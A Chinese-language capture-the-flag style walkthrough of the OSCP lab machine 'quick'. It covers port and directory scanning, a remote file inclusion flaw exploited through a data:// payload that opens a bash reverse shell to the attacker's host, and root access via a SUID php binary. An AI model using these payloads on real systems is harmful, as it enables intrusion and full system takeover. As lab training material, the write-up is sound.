【OSCP】quick

admin
admin
admin
138883
文章
114
评论
2024年3月24日04:20:14评论14 views字数 2749阅读9分9秒阅读模式
【OSCP】quick

OSCP 靶场

【OSCP】quick

靶场介绍

quick

easy

漏洞挖掘、rfi 远程文件包含利用、伪协议利用、suid-php提权

信息收集

主机发现

nmap -sn 192.168.31.0/24

【OSCP】quick

端口扫描

└─# nmap -sV -A -p- -T4 192.168.31.97 
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-09 11:44 EST
Nmap scan report for 192.168.31.97
Host is up (0.00060s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Quick Automative
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:41:D3:56 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

目录扫描

└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt     -u http://192.168.31.97 -x php,html,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.31.97
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,txt,php
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.31.97/.html                (Status: 403) [Size: 278]
http://192.168.31.97/.php                 (Status: 403) [Size: 278]
http://192.168.31.97/images               (Status: 301) [Size: 315] [--> http://192.168.31.97/images/]
http://192.168.31.97/home.php             (Status: 200) [Size: 2534]
http://192.168.31.97/contact.php          (Status: 200) [Size: 1395]
http://192.168.31.97/about.php            (Status: 200) [Size: 1446]
http://192.168.31.97/index.php            (Status: 200) [Size: 3735]
http://192.168.31.97/cars.php             (Status: 200) [Size: 1502]
http://192.168.31.97/connect.php          (Status: 500) [Size: 0]
http://192.168.31.97/.php                 (Status: 403) [Size: 278]
http://192.168.31.97/.html                (Status: 403) [Size: 278]
http://192.168.31.97/send_email.php       (Status: 302) [Size: 0] [--> contact.php]
http://192.168.31.97/server-status        (Status: 403) [Size: 278]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished

权限获取

这里通常存在文件包含或者命令执行,但是爆破了都没发现响应。利用nikto 扫描发现存在rfi

http://192.168.31.97/index.php?page=cars
nikto --url http://192.168.31.97

【OSCP】quick

我们将phpinfo写入kali,然后开启web 服务,利用远程文件包含成功执行phpinfo。这里需要注意的是后面会自动拼接.php 后缀。

【OSCP】quick

这里直接利用伪协议反弹shell

【OSCP】quick

http://192.168.31.97/index.php?page=data:text/plain,%3C?php%20system(%22id%22);?%3E
http://192.168.31.97/index.php?page=data:text/plain,%3C?php%20system(%22bash+-c+%27bash+-i+%3E%26/dev/tcp/192.168.31.181/4444+0%3E%261%27%22);?%3E

【OSCP】quick

【OSCP】quick

权限提升

【OSCP】quick

find / -type f -perm -u=s 2>/dev/null

【OSCP】quick

https://gtfobins.github.io/gtfobins/php/#sudo

【OSCP】quick

/usr/bin/php7.0 -r "pcntl_exec('/bin/sh',['-p']);"

【OSCP】quick

End

“点赞、在看与分享都是莫大的支持”

原文始发于微信公众号(贝雷帽SEC):【OSCP】quick

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月24日04:20:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【OSCP】quickhttps://cn-sec.com/archives/2598788.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息